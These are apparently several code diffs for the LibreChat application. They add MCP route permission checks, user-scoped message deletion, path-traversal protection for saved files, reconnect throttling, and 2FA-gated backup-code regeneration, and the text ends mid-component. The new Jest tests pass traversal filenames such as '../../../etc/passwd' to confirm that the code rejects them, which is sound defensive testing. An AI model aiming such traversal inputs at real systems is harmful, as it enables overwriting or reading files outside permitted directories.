@@ -281,7 +321,13 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
     const toolFlowId = flowState.metadata?.toolFlowId;
     if (toolFlowId) {
       logger.debug('[MCP OAuth] Completing tool flow', { toolFlowId });
-      await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens);
+      const completed = await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens);
+      if (!completed) {
+        logger.warn(
+          '[MCP OAuth] Tool flow state not found during completion — waiter will time out',
+          { toolFlowId },
+        );
+      }
     }

     /** Redirect to success page with flowId and serverName */
@@ -436,7 +482,12 @@ router.post('/oauth/cancel/:serverName', requireJwtAuth, async (req, res) => {
  * Reinitialize MCP server
  * This endpoint allows reinitializing a specific MCP server
  */
-router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async (req, res) => {
+router.post(
+  '/:serverName/reinitialize',
+  requireJwtAuth,
+  checkMCPUsePermissions,
+  setOAuthSession,
+  async (req, res) => {
   try {
     const { serverName } = req.params;
     const user = createSafeUser(req.user);
@@ -498,7 +549,8 @@ router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async
     logger.error('[MCP Reinitialize] Unexpected error', error);
     res.status(500).json({ error: 'Internal server error' });
   }
-});
+  },
+);

 /**
  * Get connection status for all MCP servers
@@ -605,7 +657,7 @@ router.get('/connection/status/:serverName', requireJwtAuth, async (req, res) =>
  * Check which authentication values exist for a specific MCP server
  * This endpoint returns only boolean flags indicating if values are set, not the actual values
  */
-router.get('/:serverName/auth-values', requireJwtAuth, async (req, res) => {
+router.get('/:serverName/auth-values', requireJwtAuth, checkMCPUsePermissions, async (req, res) => {
   try {
     const { serverName } = req.params;
     const user = req.user;
@@ -662,19 +714,6 @@ async function getOAuthHeaders(serverName, userId) {
   MCP Server CRUD Routes (User-Managed MCP Servers)
 */

-// Permission checkers for MCP server management
-const checkMCPUsePermissions = generateCheckAccess({
-  permissionType: PermissionTypes.MCP_SERVERS,
-  permissions: [Permissions.USE],
-  getRoleByName,
-});
-
-const checkMCPCreate = generateCheckAccess({
-  permissionType: PermissionTypes.MCP_SERVERS,
-  permissions: [Permissions.USE, Permissions.CREATE],
-  getRoleByName,
-});
-
 /**
  * Get list of accessible MCP servers
  * @route GET /api/mcp/servers


@@ -404,8 +404,8 @@ router.put('/:conversationId/:messageId/feedback', validateMessageReq, async (re
 router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => {
   try {
-    const { messageId } = req.params;
-    await deleteMessages({ messageId });
+    const { conversationId, messageId } = req.params;
+    await deleteMessages({ messageId, conversationId, user: req.user.id });
     res.status(204).send();
   } catch (error) {
     logger.error('Error deleting message:', error);


@@ -0,0 +1,124 @@
jest.mock('uuid', () => ({ v4: jest.fn(() => 'mock-uuid') }));
jest.mock('@librechat/data-schemas', () => ({
logger: { warn: jest.fn(), debug: jest.fn(), error: jest.fn() },
}));
jest.mock('@librechat/agents', () => ({
getCodeBaseURL: jest.fn(() => 'http://localhost:8000'),
}));
const mockSanitizeFilename = jest.fn();
jest.mock('@librechat/api', () => ({
logAxiosError: jest.fn(),
getBasePath: jest.fn(() => ''),
sanitizeFilename: mockSanitizeFilename,
}));
jest.mock('librechat-data-provider', () => ({
...jest.requireActual('librechat-data-provider'),
mergeFileConfig: jest.fn(() => ({ serverFileSizeLimit: 100 * 1024 * 1024 })),
getEndpointFileConfig: jest.fn(() => ({
fileSizeLimit: 100 * 1024 * 1024,
supportedMimeTypes: ['*/*'],
})),
fileConfig: { checkType: jest.fn(() => true) },
}));
jest.mock('~/models', () => ({
createFile: jest.fn().mockResolvedValue({}),
getFiles: jest.fn().mockResolvedValue([]),
updateFile: jest.fn(),
claimCodeFile: jest.fn().mockResolvedValue({ file_id: 'mock-uuid', usage: 0 }),
}));
const mockSaveBuffer = jest.fn().mockResolvedValue('/uploads/user123/mock-uuid__output.csv');
jest.mock('~/server/services/Files/strategies', () => ({
getStrategyFunctions: jest.fn(() => ({
saveBuffer: mockSaveBuffer,
})),
}));
jest.mock('~/server/services/Files/permissions', () => ({
filterFilesByAgentAccess: jest.fn().mockResolvedValue([]),
}));
jest.mock('~/server/services/Files/images/convert', () => ({
convertImage: jest.fn(),
}));
jest.mock('~/server/utils', () => ({
determineFileType: jest.fn().mockResolvedValue({ mime: 'text/csv' }),
}));
jest.mock('axios', () =>
jest.fn().mockResolvedValue({
data: Buffer.from('file-content'),
}),
);
const { createFile } = require('~/models');
const { processCodeOutput } = require('../process');
const baseParams = {
req: {
user: { id: 'user123' },
config: {
fileStrategy: 'local',
imageOutputType: 'webp',
fileConfig: {},
},
},
id: 'code-file-id',
apiKey: 'test-key',
toolCallId: 'tool-1',
conversationId: 'conv-1',
messageId: 'msg-1',
session_id: 'session-1',
};
describe('processCodeOutput path traversal protection', () => {
beforeEach(() => {
jest.clearAllMocks();
});
test('sanitizeFilename is called with the raw artifact name', async () => {
mockSanitizeFilename.mockReturnValueOnce('output.csv');
await processCodeOutput({ ...baseParams, name: 'output.csv' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('output.csv');
});
test('sanitized name is used in saveBuffer fileName', async () => {
mockSanitizeFilename.mockReturnValueOnce('sanitized-name.txt');
await processCodeOutput({ ...baseParams, name: '../../../tmp/poc.txt' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../tmp/poc.txt');
const call = mockSaveBuffer.mock.calls[0][0];
expect(call.fileName).toBe('mock-uuid__sanitized-name.txt');
});
test('sanitized name is stored as filename in the file record', async () => {
mockSanitizeFilename.mockReturnValueOnce('safe-output.csv');
await processCodeOutput({ ...baseParams, name: 'unsafe/../../output.csv' });
const fileArg = createFile.mock.calls[0][0];
expect(fileArg.filename).toBe('safe-output.csv');
});
test('sanitized name is used for image file records', async () => {
const { convertImage } = require('~/server/services/Files/images/convert');
convertImage.mockResolvedValueOnce({
filepath: '/images/user123/mock-uuid.webp',
bytes: 100,
});
mockSanitizeFilename.mockReturnValueOnce('safe-chart.png');
await processCodeOutput({ ...baseParams, name: '../../../chart.png' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../chart.png');
const fileArg = createFile.mock.calls[0][0];
expect(fileArg.filename).toBe('safe-chart.png');
});
});


@@ -3,7 +3,7 @@ const { v4 } = require('uuid');
 const axios = require('axios');
 const { logger } = require('@librechat/data-schemas');
 const { getCodeBaseURL } = require('@librechat/agents');
-const { logAxiosError, getBasePath } = require('@librechat/api');
+const { logAxiosError, getBasePath, sanitizeFilename } = require('@librechat/api');
 const {
   Tools,
   megabyte,
@@ -146,6 +146,13 @@ const processCodeOutput = async ({
       );
     }

+    const safeName = sanitizeFilename(name);
+    if (safeName !== name) {
+      logger.warn(
+        `[processCodeOutput] Filename sanitized: "${name}" -> "${safeName}" | conv=${conversationId}`,
+      );
+    }
+
     if (isImage) {
       const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1;
       const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`);
@@ -156,7 +163,7 @@ const processCodeOutput = async ({
         file_id,
         messageId,
         usage,
-        filename: name,
+        filename: safeName,
         conversationId,
         user: req.user.id,
         type: `image/${appConfig.imageOutputType}`,
@@ -200,7 +207,7 @@ const processCodeOutput = async ({
       );
     }

-    const fileName = `${file_id}__${name}`;
+    const fileName = `${file_id}__${safeName}`;
     const filepath = await saveBuffer({
       userId: req.user.id,
       buffer,
@@ -213,7 +220,7 @@ const processCodeOutput = async ({
       filepath,
       messageId,
       object: 'file',
-      filename: name,
+      filename: safeName,
       type: mimeType,
       conversationId,
       user: req.user.id,
@@ -229,6 +236,11 @@ const processCodeOutput = async ({
     await createFile(file, true);
     return Object.assign(file, { messageId, toolCallId });
   } catch (error) {
+    if (error?.message === 'Path traversal detected in filename') {
+      logger.warn(
+        `[processCodeOutput] Path traversal blocked for file "${name}" | conv=${conversationId}`,
+      );
+    }
     logAxiosError({
       message: 'Error downloading/processing code environment file',
       error,


@@ -58,6 +58,7 @@ jest.mock('@librechat/agents', () => ({
 jest.mock('@librechat/api', () => ({
   logAxiosError: jest.fn(),
   getBasePath: jest.fn(() => ''),
+  sanitizeFilename: jest.fn((name) => name),
 }));

 // Mock models


@@ -0,0 +1,69 @@
jest.mock('@librechat/api', () => ({ deleteRagFile: jest.fn() }));
jest.mock('@librechat/data-schemas', () => ({
logger: { warn: jest.fn(), error: jest.fn() },
}));
const mockTmpBase = require('fs').mkdtempSync(
require('path').join(require('os').tmpdir(), 'crud-traversal-'),
);
jest.mock('~/config/paths', () => {
const path = require('path');
return {
publicPath: path.join(mockTmpBase, 'public'),
uploads: path.join(mockTmpBase, 'uploads'),
};
});
const fs = require('fs');
const path = require('path');
const { saveLocalBuffer } = require('../crud');
describe('saveLocalBuffer path containment', () => {
beforeAll(() => {
fs.mkdirSync(path.join(mockTmpBase, 'public', 'images'), { recursive: true });
fs.mkdirSync(path.join(mockTmpBase, 'uploads'), { recursive: true });
});
afterAll(() => {
fs.rmSync(mockTmpBase, { recursive: true, force: true });
});
test('rejects filenames with path traversal sequences', async () => {
await expect(
saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('malicious'),
fileName: '../../../etc/passwd',
basePath: 'uploads',
}),
).rejects.toThrow('Path traversal detected in filename');
});
test('rejects prefix-collision traversal (startsWith bypass)', async () => {
fs.mkdirSync(path.join(mockTmpBase, 'uploads', 'user10'), { recursive: true });
await expect(
saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('malicious'),
fileName: '../user10/evil',
basePath: 'uploads',
}),
).rejects.toThrow('Path traversal detected in filename');
});
test('allows normal filenames', async () => {
const result = await saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('safe content'),
fileName: 'file-id__output.csv',
basePath: 'uploads',
});
expect(result).toBe('/uploads/user1/file-id__output.csv');
const filePath = path.join(mockTmpBase, 'uploads', 'user1', 'file-id__output.csv');
expect(fs.existsSync(filePath)).toBe(true);
fs.unlinkSync(filePath);
});
});

View file

@@ -78,7 +78,13 @@ async function saveLocalBuffer({ userId, buffer, fileName, basePath = 'images' }
       fs.mkdirSync(directoryPath, { recursive: true });
     }

-    fs.writeFileSync(path.join(directoryPath, fileName), buffer);
+    const resolvedDir = path.resolve(directoryPath);
+    const resolvedPath = path.resolve(resolvedDir, fileName);
+    const rel = path.relative(resolvedDir, resolvedPath);
+    if (rel.startsWith('..') || path.isAbsolute(rel) || rel.includes(`..${path.sep}`)) {
+      throw new Error('Path traversal detected in filename');
+    }
+    fs.writeFileSync(resolvedPath, buffer);

     const filePath = path.posix.join('/', basePath, userId, fileName);
@@ -165,9 +171,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
 }

 /**
- * Validates if a given filepath is within a specified subdirectory under a base path. This function constructs
- * the expected base path using the base, subfolder, and user id from the request, and then checks if the
- * provided filepath starts with this constructed base path.
+ * Validates that a filepath is strictly contained within a subdirectory under a base path,
+ * using path.relative to prevent prefix-collision bypasses.
  *
  * @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`.
  * @param {string} base - The base directory path.
@@ -180,7 +185,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
 const isValidPath = (req, base, subfolder, filepath) => {
   const normalizedBase = path.resolve(base, subfolder, req.user.id);
   const normalizedFilepath = path.resolve(filepath);
-  return normalizedFilepath.startsWith(normalizedBase);
+  const rel = path.relative(normalizedBase, normalizedFilepath);
+  return !rel.startsWith('..') && !path.isAbsolute(rel) && !rel.includes(`..${path.sep}`);
 };

 /**


@@ -34,6 +34,55 @@ const { reinitMCPServer } = require('./Tools/mcp');
 const { getAppConfig } = require('./Config');
 const { getLogStores } = require('~/cache');

+const MAX_CACHE_SIZE = 1000;
+const lastReconnectAttempts = new Map();
+const RECONNECT_THROTTLE_MS = 10_000;
+const missingToolCache = new Map();
+const MISSING_TOOL_TTL_MS = 10_000;
+
+function evictStale(map, ttl) {
+  if (map.size <= MAX_CACHE_SIZE) {
+    return;
+  }
+  const now = Date.now();
+  for (const [key, timestamp] of map) {
+    if (now - timestamp >= ttl) {
+      map.delete(key);
+    }
+    if (map.size <= MAX_CACHE_SIZE) {
+      return;
+    }
+  }
+}
+
+const unavailableMsg =
+  "This tool's MCP server is temporarily unavailable. Please try again shortly.";
+
+/**
+ * @param {string} toolName
+ * @param {string} serverName
+ */
+function createUnavailableToolStub(toolName, serverName) {
+  const normalizedToolKey = `${toolName}${Constants.mcp_delimiter}${normalizeServerName(serverName)}`;
+  const _call = async () => [unavailableMsg, null];
+  const toolInstance = tool(_call, {
+    schema: {
+      type: 'object',
+      properties: {
+        input: { type: 'string', description: 'Input for the tool' },
+      },
+      required: [],
+    },
+    name: normalizedToolKey,
+    description: unavailableMsg,
+    responseFormat: AgentConstants.CONTENT_AND_ARTIFACT,
+  });
+  toolInstance.mcp = true;
+  toolInstance.mcpRawServerName = serverName;
+  return toolInstance;
+}
+
 function isEmptyObjectSchema(jsonSchema) {
   return (
     jsonSchema != null &&
@@ -211,6 +260,17 @@ async function reconnectServer({
   logger.debug(
     `[MCP][reconnectServer] serverName: ${serverName}, user: ${user?.id}, hasUserMCPAuthMap: ${!!userMCPAuthMap}`,
   );
+
+  const throttleKey = `${user.id}:${serverName}`;
+  const now = Date.now();
+  const lastAttempt = lastReconnectAttempts.get(throttleKey) ?? 0;
+  if (now - lastAttempt < RECONNECT_THROTTLE_MS) {
+    logger.debug(`[MCP][reconnectServer] Throttled reconnect for ${serverName}`);
+    return null;
+  }
+  lastReconnectAttempts.set(throttleKey, now);
+  evictStale(lastReconnectAttempts, RECONNECT_THROTTLE_MS);
+
   const runId = Constants.USE_PRELIM_RESPONSE_MESSAGE_ID;
   const flowId = `${user.id}:${serverName}:${Date.now()}`;
   const flowManager = getFlowStateManager(getLogStores(CacheKeys.FLOWS));
@@ -267,7 +327,7 @@ async function reconnectServer({
       userMCPAuthMap,
       forceNew: true,
       returnOnOAuth: false,
-      connectionTimeout: Time.TWO_MINUTES,
+      connectionTimeout: Time.THIRTY_SECONDS,
     });
   } finally {
     // Clean up abort handler to prevent memory leaks
@@ -330,9 +390,13 @@ async function createMCPTools({
     userMCPAuthMap,
     streamId,
   });
+  if (result === null) {
+    logger.debug(`[MCP][${serverName}] Reconnect throttled, skipping tool creation.`);
+    return [];
+  }
   if (!result || !result.tools) {
     logger.warn(`[MCP][${serverName}] Failed to reinitialize MCP server.`);
-    return;
+    return [];
   }

   const serverTools = [];
@@ -402,6 +466,14 @@ async function createMCPTool({
   /** @type {LCTool | undefined} */
   let toolDefinition = availableTools?.[toolKey]?.function;
   if (!toolDefinition) {
+    const cachedAt = missingToolCache.get(toolKey);
+    if (cachedAt && Date.now() - cachedAt < MISSING_TOOL_TTL_MS) {
+      logger.debug(
+        `[MCP][${serverName}][${toolName}] Tool in negative cache, returning unavailable stub.`,
+      );
+      return createUnavailableToolStub(toolName, serverName);
+    }
     logger.warn(
       `[MCP][${serverName}][${toolName}] Requested tool not found in available tools, re-initializing MCP server.`,
     );
@@ -415,11 +487,18 @@ async function createMCPTool({
       streamId,
     });
     toolDefinition = result?.availableTools?.[toolKey]?.function;
+    if (!toolDefinition) {
+      missingToolCache.set(toolKey, Date.now());
+      evictStale(missingToolCache, MISSING_TOOL_TTL_MS);
+    }
   }

   if (!toolDefinition) {
-    logger.warn(`[MCP][${serverName}][${toolName}] Tool definition not found, cannot create tool.`);
-    return;
+    logger.warn(
+      `[MCP][${serverName}][${toolName}] Tool definition not found, returning unavailable stub.`,
+    );
+    return createUnavailableToolStub(toolName, serverName);
   }

   return createToolInstance({
@@ -720,4 +799,5 @@ module.exports = {
   getMCPSetupData,
   checkOAuthFlowStatus,
   getServerConnectionStatus,
+  createUnavailableToolStub,
 };


@@ -45,6 +45,7 @@ const {
   getMCPSetupData,
   checkOAuthFlowStatus,
   getServerConnectionStatus,
+  createUnavailableToolStub,
 } = require('./MCP');

 jest.mock('./Config', () => ({
@@ -1098,6 +1099,188 @@ describe('User parameter passing tests', () => {
   });
 });
describe('createUnavailableToolStub', () => {
it('should return a tool whose _call returns a valid CONTENT_AND_ARTIFACT two-tuple', async () => {
const stub = createUnavailableToolStub('myTool', 'myServer');
// invoke() goes through langchain's base tool, which checks responseFormat.
// CONTENT_AND_ARTIFACT requires [content, artifact] — a bare string would throw:
// "Tool response format is "content_and_artifact" but the output was not a two-tuple"
const result = await stub.invoke({});
// If we reach here without throwing, the two-tuple format is correct.
// invoke() returns the content portion of [content, artifact] as a string.
expect(result).toContain('temporarily unavailable');
});
});
describe('negative tool cache and throttle interaction', () => {
it('should cache tool as missing even when throttled (cross-user dedup)', async () => {
const mockUser = { id: 'throttle-test-user' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// First call: reconnect succeeds but tool not found
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: mockUser,
toolKey: `missing-tool${D}cache-dedup-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
// Second call within 10s for DIFFERENT tool on same server:
// reconnect is throttled (returns null), tool is still cached as missing.
// This is intentional: the cache acts as cross-user dedup since the
// throttle is per-user-per-server and can't prevent N different users
// from each triggering their own reconnect.
const result2 = await createMCPTool({
res: mockRes,
user: mockUser,
toolKey: `other-tool${D}cache-dedup-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result2).toBeDefined();
expect(result2.name).toContain('other-tool');
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
it('should prevent user B from triggering reconnect when user A already cached the tool', async () => {
const userA = { id: 'cache-user-A' };
const userB = { id: 'cache-user-B' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// User A: real reconnect, tool not found → cached
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `shared-tool${D}cross-user-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// User B requests the SAME tool within 10s.
// The negative cache is keyed by toolKey (no user prefix), so user B
// gets a cache hit and no reconnect fires. This is the cross-user
// storm protection: without this, user B's unthrottled first request
// would trigger a second reconnect to the same server.
const result = await createMCPTool({
res: mockRes,
user: userB,
toolKey: `shared-tool${D}cross-user-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result).toBeDefined();
expect(result.name).toContain('shared-tool');
// reinitMCPServer still called only once — user B hit the cache
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
it('should prevent user B from triggering reconnect for throttle-cached tools', async () => {
const userA = { id: 'storm-user-A' };
const userB = { id: 'storm-user-B' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// User A: real reconnect for tool-1, tool not found → cached
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `tool-1${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
// User A: tool-2 on same server within 10s → throttled → cached from throttle
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `tool-2${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// User B requests tool-2 — gets cache hit from the throttle-cached entry.
// Without this caching, user B would trigger a real reconnect since
// user B has their own throttle key and hasn't reconnected yet.
const result = await createMCPTool({
res: mockRes,
user: userB,
toolKey: `tool-2${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result).toBeDefined();
expect(result.name).toContain('tool-2');
// Still only 1 real reconnect — user B was protected by the cache
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
});
describe('createMCPTools throttle handling', () => {
it('should return empty array with debug log when reconnect is throttled', async () => {
const mockUser = { id: 'throttle-tools-user' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// First call: real reconnect
mockReinitMCPServer.mockResolvedValueOnce({
tools: [{ name: 'tool1' }],
availableTools: {
[`tool1${D}throttle-tools-server`]: {
function: { description: 'Tool 1', parameters: {} },
},
},
});
await createMCPTools({
res: mockRes,
user: mockUser,
serverName: 'throttle-tools-server',
provider: 'openai',
userMCPAuthMap: {},
});
// Second call within 10s — throttled
const result = await createMCPTools({
res: mockRes,
user: mockUser,
serverName: 'throttle-tools-server',
provider: 'openai',
userMCPAuthMap: {},
});
expect(result).toEqual([]);
// reinitMCPServer called only once — second was throttled
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// Should log at debug level (not warn) for throttled case
expect(logger.debug).toHaveBeenCalledWith(expect.stringContaining('Reconnect throttled'));
});
});
describe('User parameter integrity', () => {
it('should preserve user object properties through the call chain', async () => {
const complexUser = {


@@ -153,9 +153,11 @@ const generateBackupCodes = async (count = 10) => {
* @param {Object} params
* @param {Object} params.user
* @param {string} params.backupCode
* @param {boolean} [params.persist=true] - Whether to persist the used-mark to the database.
* Pass `false` when the caller will immediately overwrite `backupCodes` (e.g. re-enrollment).
* @returns {Promise<boolean>}
*/
const verifyBackupCode = async ({ user, backupCode, persist = true }) => {
if (!backupCode || !user || !Array.isArray(user.backupCodes)) {
return false;
}
@@ -165,17 +167,50 @@ const verifyBackupCode = async ({ user, backupCode }) => {
(codeObj) => codeObj.codeHash === hashedInput && !codeObj.used,
);
if (!matchingCode) {
return false;
}
if (persist) {
const updatedBackupCodes = user.backupCodes.map((codeObj) =>
codeObj.codeHash === hashedInput && !codeObj.used
? { ...codeObj, used: true, usedAt: new Date() }
: codeObj,
);
await updateUser(user._id, { backupCodes: updatedBackupCodes });
}
return true;
};
/**
* Verifies a user's identity via TOTP token or backup code.
* @param {Object} params
* @param {Object} params.user - The user document (must include totpSecret and backupCodes).
* @param {string} [params.token] - A 6-digit TOTP token.
* @param {string} [params.backupCode] - An 8-character backup code.
* @param {boolean} [params.persistBackupUse=true] - Whether to mark the backup code as used in the DB.
* @returns {Promise<{ verified: boolean, status?: number, message?: string }>}
*/
const verifyOTPOrBackupCode = async ({ user, token, backupCode, persistBackupUse = true }) => {
if (!token && !backupCode) {
return { verified: false, status: 400 };
}
if (token) {
const secret = await getTOTPSecret(user.totpSecret);
if (!secret) {
return { verified: false, status: 400, message: '2FA secret is missing or corrupted' };
}
const ok = await verifyTOTP(secret, token);
return ok
? { verified: true }
: { verified: false, status: 401, message: 'Invalid token or backup code' };
}
const ok = await verifyBackupCode({ user, backupCode, persist: persistBackupUse });
return ok
? { verified: true }
: { verified: false, status: 401, message: 'Invalid token or backup code' };
};
/**
@@ -213,11 +248,12 @@ const generate2FATempToken = (userId) => {
};
module.exports = {
verifyOTPOrBackupCode,
generate2FATempToken,
generateBackupCodes,
generateTOTPSecret,
verifyBackupCode,
getTOTPSecret,
generateTOTP,
verifyTOTP,
};
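The new `verifyOTPOrBackupCode` helper returns a `{ verified, status?, message? }` object rather than throwing. A hypothetical Express-style guard below shows how a caller might branch on that shape; `requireTwoFactor` and the injected verifier are illustrative only, not part of the codebase:

```javascript
// Hypothetical guard built on the { verified, status, message } result shape
// returned by verifyOTPOrBackupCode above. The verifier is injected as a
// parameter so the sketch stays self-contained.
async function requireTwoFactor(req, res, next, verify) {
  const { token, backupCode } = req.body ?? {};
  const result = await verify({ user: req.user, token, backupCode });
  if (!result.verified) {
    // Fall back to 401 when the verifier supplies no status (it normally does).
    return res
      .status(result.status ?? 401)
      .json({ message: result.message ?? 'Verification failed' });
  }
  return next();
}
```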


@@ -358,16 +358,15 @@ function splitAtTargetLevel(messages, targetMessageId) {
* @param {object} params - The parameters for duplicating the conversation.
* @param {string} params.userId - The ID of the user duplicating the conversation.
* @param {string} params.conversationId - The ID of the conversation to duplicate.
* @param {string} [params.title] - Optional title override for the duplicate.
* @returns {Promise<{ conversation: TConversation, messages: TMessage[] }>} The duplicated conversation and messages.
*/
async function duplicateConversation({ userId, conversationId, title }) {
const originalConvo = await getConvo(userId, conversationId);
if (!originalConvo) {
throw new Error('Conversation not found');
}
const originalMessages = await getMessages({
user: userId,
conversationId,
@@ -383,14 +382,11 @@ async function duplicateConversation({ userId, conversationId }) {
cloneMessagesWithTimestamps(messagesToClone, importBatchBuilder);
const duplicateTitle = title || originalConvo.title;
const result = importBatchBuilder.finishConversation(duplicateTitle, new Date(), originalConvo);
await importBatchBuilder.saveBatch();
logger.debug(
`user: ${userId} | New conversation "${duplicateTitle}" duplicated from conversation ID ${conversationId}`,
);
const conversation = await getConvo(userId, result.conversation.conversationId);


@@ -1,7 +1,10 @@
const fs = require('fs').promises;
const { resolveImportMaxFileSize } = require('@librechat/api');
const { logger } = require('@librechat/data-schemas');
const { getImporter } = require('./importers');
const maxFileSize = resolveImportMaxFileSize();
/**
* Job definition for importing a conversation.
* @param {{ filepath, requestUserId }} job - The job object.
@@ -11,11 +14,10 @@ const importConversations = async (job) => {
try {
logger.debug(`user: ${requestUserId} | Importing conversation(s) from file...`);
const fileInfo = await fs.stat(filepath);
if (fileInfo.size > maxFileSize) {
throw new Error(
`File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${maxFileSize} bytes.`,
);
}
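The change above replaces a raw `process.env` read with a resolved `maxFileSize` computed once at module load. A sketch of what such a resolver might look like follows; the function name, default value, and fallback behavior are assumptions, since the real `resolveImportMaxFileSize` lives in `@librechat/api` and is not shown in this diff:

```javascript
// Assumed-behavior sketch of an env-var size resolver: read the variable,
// fall back to a default when it is unset or not a positive number.
// The default of 100 MiB is illustrative, not the library's actual value.
const DEFAULT_IMPORT_MAX_FILE_SIZE_BYTES = 100 * 1024 * 1024;

function resolveImportMaxFileSizeSketch(env = process.env) {
  const raw = env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
  const parsed = Number(raw);
  // Reject NaN, Infinity, zero, and negatives; keep any positive finite number.
  if (!Number.isFinite(parsed) || parsed <= 0) {
    return DEFAULT_IMPORT_MAX_FILE_SIZE_BYTES;
  }
  return parsed;
}
```

Resolving once at module load also fixes a subtle bug in the old code: comparing `fileInfo.size` against a raw env string relied on implicit coercion and silently allowed any size when the variable was unset.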


@@ -1,5 +1,4 @@
// --- Mocks ---
jest.mock('fs');
jest.mock('path');
jest.mock('node-fetch');


@@ -1,12 +1,23 @@
import React, { useState } from 'react';
import { RefreshCcw } from 'lucide-react';
import { useSetRecoilState } from 'recoil';
import { motion, AnimatePresence } from 'framer-motion';
import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp';
import type {
TRegenerateBackupCodesResponse,
TRegenerateBackupCodesRequest,
TBackupCode,
TUser,
} from 'librechat-data-provider';
import {
InputOTPSeparator,
InputOTPGroup,
InputOTPSlot,
OGDialogContent,
OGDialogTitle,
OGDialogTrigger,
OGDialog,
InputOTP,
Button,
Label,
Spinner,
@@ -15,7 +26,6 @@ import {
} from '@librechat/client';
import { useRegenerateBackupCodesMutation } from '~/data-provider';
import { useAuthContext, useLocalize } from '~/hooks';
import store from '~/store';
const BackupCodesItem: React.FC = () => {
@@ -24,25 +34,30 @@ const BackupCodesItem: React.FC = () => {
const { showToast } = useToastContext();
const setUser = useSetRecoilState(store.user);
const [isDialogOpen, setDialogOpen] = useState<boolean>(false);
const [otpToken, setOtpToken] = useState('');
const [useBackup, setUseBackup] = useState(false);
const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation();
const needs2FA = !!user?.twoFactorEnabled;
const fetchBackupCodes = (auto: boolean = false) => {
let payload: TRegenerateBackupCodesRequest | undefined;
if (needs2FA && otpToken.trim()) {
payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() };
}
regenerateBackupCodes(payload, {
onSuccess: (data: TRegenerateBackupCodesResponse) => {
const newBackupCodes: TBackupCode[] = data.backupCodesHash;
setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser);
setOtpToken('');
showToast({
message: localize('com_ui_backup_codes_regenerated'),
status: 'success',
});
// Trigger file download only when user explicitly clicks the button.
if (!auto && newBackupCodes.length) {
const codesString = data.backupCodes.join('\n');
const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' });
@@ -66,6 +81,8 @@ const BackupCodesItem: React.FC = () => {
fetchBackupCodes(false);
};
const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6);
return (
<OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}>
<div className="flex items-center justify-between">
@@ -161,10 +178,10 @@ const BackupCodesItem: React.FC = () => {
);
})}
</div>
<div className="mt-6 flex justify-center">
<Button
onClick={handleRegenerate}
disabled={isLoading || !otpReady}
variant="default"
className="px-8 py-3 transition-all disabled:opacity-50"
>
@@ -183,7 +200,7 @@ const BackupCodesItem: React.FC = () => {
<div className="flex flex-col items-center gap-4 p-6 text-center">
<Button
onClick={handleRegenerate}
disabled={isLoading || !otpReady}
variant="default"
className="px-8 py-3 transition-all disabled:opacity-50"
>
@@ -192,6 +209,59 @@ const BackupCodesItem: React.FC = () => {
</Button>
</div>
)}
{needs2FA && (
<div className="mt-6 space-y-3">
<Label className="text-sm font-medium">
{localize('com_ui_2fa_verification_required')}
</Label>
<div className="flex justify-center">
<InputOTP
value={otpToken}
onChange={setOtpToken}
maxLength={useBackup ? 8 : 6}
pattern={useBackup ? REGEXP_ONLY_DIGITS_AND_CHARS : REGEXP_ONLY_DIGITS}
className="gap-2"
>
{useBackup ? (
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
<InputOTPSlot index={6} />
<InputOTPSlot index={7} />
</InputOTPGroup>
) : (
<>
<InputOTPGroup>
<InputOTPSlot index={0} />
